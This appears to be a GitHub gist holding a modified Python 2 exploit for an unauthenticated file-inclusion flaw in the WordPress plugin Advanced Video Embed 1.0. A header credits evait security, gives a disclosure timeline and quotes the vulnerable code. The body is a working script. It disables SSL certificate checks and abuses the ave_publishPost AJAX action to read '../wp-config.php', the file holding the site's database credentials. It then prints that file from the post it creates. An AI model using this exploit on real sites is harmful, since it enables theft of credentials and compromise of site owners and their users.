Modified exploit for WordPress Plugin Advanced Video 1.0 - Local File Inclusion - fixed the SSL issue
#!/usr/bin/env python | |
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation | |
# Google Dork: N/A | |
# Date: 04/01/2016 | |
# Exploit Author: evait security GmbH | |
# Vendor Homepage: arshmultani - http://dscom.it/ | |
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/ | |
# Version: 1.0 | |
# Tested on: Linux Apache / Wordpress 4.2.2 | |
# Timeline | |
# 03/24/2016 - Bug discovered | |
# 03/24/2016 - Initial notification of vendor | |
# 04/01/2016 - No answer from vendor, public release of bug | |
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57: | |
# function ave_publishPost(){ | |
# $title = $_REQUEST['title']; | |
# $term = $_REQUEST['term']; | |
# $thumb = $_REQUEST['thumb']; | |
# <snip> | |
# Line 78: | |
# $image_data = file_get_contents($thumb); | |
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH] | |
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config) | |
import random | |
import urllib2 | |
import re | |
import ssl | |
ssl._create_default_https_context = ssl._create_unverified_context | |
url = "https://192.168.117.136:12380/blogblog/" # insert url to wordpress | |
randomID = long(random.random() * 100000000000000000L) | |
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php') | |
content = objHtml.readlines() | |
for line in content: | |
numbers = re.findall(r'\d+',line) | |
id = numbers[-1] | |
id = int(id) / 10 | |
objHtml = urllib2.urlopen(url + '/?p=' + str(id)) | |
content = objHtml.readlines() | |
for line in content: | |
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line: | |
urls=re.findall('"(https?://.*?)"', line) | |
print urllib2.urlopen(urls[0]).read() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment